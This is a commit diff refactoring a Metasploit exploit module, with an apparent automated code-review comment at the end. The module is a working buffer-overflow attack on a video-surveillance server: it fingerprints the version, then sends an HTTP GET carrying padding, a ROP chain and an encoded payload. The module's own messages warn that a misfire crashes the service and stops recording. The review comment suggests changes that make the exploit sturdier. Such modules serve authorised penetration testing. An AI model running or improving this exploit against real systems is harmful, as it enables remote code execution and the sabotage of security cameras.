codefixing

master
Maurice Popp 2017-10-07 14:06:58 +02:00
parent 7fe750422e
commit 8d50c34e4b
1 changed files with 156 additions and 178 deletions


@ -40,11 +40,16 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DisclosureDate' => 'Jan 24 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(13003)
])
end
def fingerprint
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...')
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml'))
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
@doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))
statistics = @doc.css('modulestate')
statistics.each do |x|
if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
@ -57,8 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Appears, mytarget
end
end
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.')
print_status("Make sure that you know the exact version, otherwise you'll knock out the service.")
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')
print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
[Exploit::CheckCode::Unknown, nil]
@ -222,44 +227,18 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
if target['auto']
checkcode, target = fingerprint
if checkcode.to_s.include? 'unknown'
print_status('No vulnerable Version detected - exploit aborted.')
else
checkcode, self.target = fingerprint
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
target_rop, target_overwrite, target_stack_align = ropchain(target)
begin
connect
print_status('Crafting Exploit...')
http_req = 'GET /'
buffer_200 = "\x41" * 200
rop = target_rop
payload.encoded
buffer_1823 = "\x41" * 1823
overwrite = target_overwrite
stack_align = target_stack_align
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
print_status('Exploit ready for sending...')
sock.put(exploit, 'Timeout' => 20)
print_status('Exploit sent!')
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
print_status('Closing socket.')
disconnect
end
end
else
print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
print_status("Selected version: #{self.target.name}")
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
end
begin
connect
print_status('Crafting Exploit...')
http_req = 'GET /'
buffer_200 = "\x41" * 200
rop = target_rop
@ -279,7 +258,6 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Closing socket.')
disconnect
end
end
end
end
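Review bot: The rewritten fetch in `fingerprint` still passes a URL string to `Kernel#open`, the pattern RuboCop's `Security/Open` cop flags and which open-uri no longer supports from Ruby 3.0 on; this string cleanup is a good moment to replace it. Use `URI.open` explicitly, e.g. `@doc = Nokogiri::XML(URI.open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))`, or route the request through the framework's HTTP client so the module's connection settings apply to it. No rescue is visible around this call, and the body of `fingerprint` continues outside the hunk, so a refused or timed-out connection may raise instead of reaching the `[Exploit::CheckCode::Unknown, nil]` return; that is worth confirming. In `exploit`, the new guard `checkcode.to_s.include? 'unknown'` depends on how the check code is rendered as a string, so `checkcode == Exploit::CheckCode::Unknown` would be sturdier.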